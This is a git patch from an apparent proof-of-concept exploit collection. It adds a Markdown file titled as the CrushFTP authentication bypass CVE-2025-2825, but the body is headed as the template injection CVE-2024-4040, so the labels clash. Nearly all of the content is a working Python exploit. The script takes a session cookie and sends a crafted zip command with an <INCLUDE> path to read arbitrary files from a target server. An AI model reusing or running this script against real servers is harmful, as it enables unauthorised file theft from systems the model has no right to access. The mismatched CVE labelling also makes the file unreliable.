From e7d58c6b097a842ceafa29973af20fed1f56729c Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 31 Mar 2025 14:53:36 +0800
Subject: [PATCH] =?UTF-8?q?Update=20and=20rename=20CrushFTP=E8=BA=AB?=
 =?UTF-8?q?=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=BB=95=E8=BF=87(CVE-2025-2825)=20?=
 =?UTF-8?q?to=20CrushFTP=E8=BA=AB=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=BB=95?=
 =?UTF-8?q?=E8=BF=87(CVE-2025-2825).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../CrushFTP身份验证绕过(CVE-2025-2825)       |  1 -
 .../CrushFTP身份验证绕过(CVE-2025-2825).md    | 60 +++++++++++++++++++
 2 files changed, 60 insertions(+), 1 deletion(-)
 delete mode 100644 wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825)
 create mode 100644 wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md

diff --git a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825) b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825)
deleted file mode 100644
index 8b13789..0000000
--- a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825)
+++ /dev/null
@@ -1 +0,0 @@
-
diff --git a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
new file mode 100644
index 0000000..425dae0
--- /dev/null
+++ b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
@@ -0,0 +1,60 @@
+
+## CrushFTP服务器端模板注入(CVE-2024-4040)
+
+## poc
+```python
+import requests
+import argparse
+
+HEADER = '\033[95m'
+OKBLUE = '\033[94m'
+OKCYAN = '\033[96m'
+OKGREEN = '\033[92m'
+WARNING = '\033[93m'
+FAIL = '\033[91m'
+ENDC = '\033[0m'
+BOLD = '\033[1m'
+UNDERLINE = '\033[4m'
+
+def get_cookies(url):
+    try:
+        session = requests.Session()
+        response = session.get(url)
+        if response.status_code != 200:
+            raise Exception("Failed to connect to the server")
+        session.cookies.get_dict()
+        return session.cookies.get_dict()
+    except Exception as e:
+        print(FAIL + "Error: " + str(e) + ENDC)
+        quit()
+
+def exploit(url, cookies, path):
+    try:
+        if not path.startswith("/") or not path.endswith("/"):
+            raise Exception("Invalid path format. Path should start and end with '/'")
+        url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=<INCLUDE>" + path + "</INCLUDE>&names=*"
+        response = requests.get(url, cookies=cookies)
+        if response.status_code != 200:
+            raise Exception("Failed to connect to the server")
+        return response.text
+    except Exception as e:
+        print(FAIL + "Error: " + str(e) + ENDC)
+        quit()
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-u", "--url", help="URL of the target", required=True)
+    parser.add_argument("-p", "--path", help="Path to the file to read", required=True)
+    args = parser.parse_args()
+    url = args.url
+    path = args.path
+    if not url.startswith("http"):
+        print(WARNING + "URL should start with 'http' or 'https'")
+        quit()
+    cookies = get_cookies(url)
+    if 'currentAuth' not in cookies:
+        print(WARNING + "Not vulnerable" + ENDC)
+        quit()
+    else:
+        print(OKCYAN + exploit(url, cookies, path) + ENDC)
+```